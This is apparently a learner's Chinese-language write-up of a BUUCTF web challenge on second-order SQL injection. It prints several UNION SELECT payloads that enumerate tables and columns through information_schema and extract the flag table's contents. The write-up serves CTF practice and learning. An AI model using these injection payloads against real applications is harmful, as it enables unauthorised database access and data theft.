53,【3】BUUCTF WEB october 2019 Twice SQLinjection
题目得到信息,2次注入,进入靶场
登录页面,很自然想到SQL
第一次注入应该是这个可以登录,注册,提交简介的页面
第二次注入应该是在info处注入,信息显示在简介处
我真的纯脑子有病,人家二次注入不是注入两次,是一次注入通过两次操作实现,如下所示
被转义了
不过恶意语句输两次就可以了
database()库名ctftraining
1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'#
表名flag,news,users
1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#
字段名flag
1' union select group_concat(flag) from ctftraining.flag#
????注册失败????
修改修改
1' union select flag from ctftraining.flag#
??????最后一步不显示flag
再修改修改
1' union select flag from flag#
这句就对了
得到flag
笔记
1,SQL注入还有2次注入的类型
2,爆出信息的语句需要多次修改
3,看到陌生词语先搜搜,不能想当然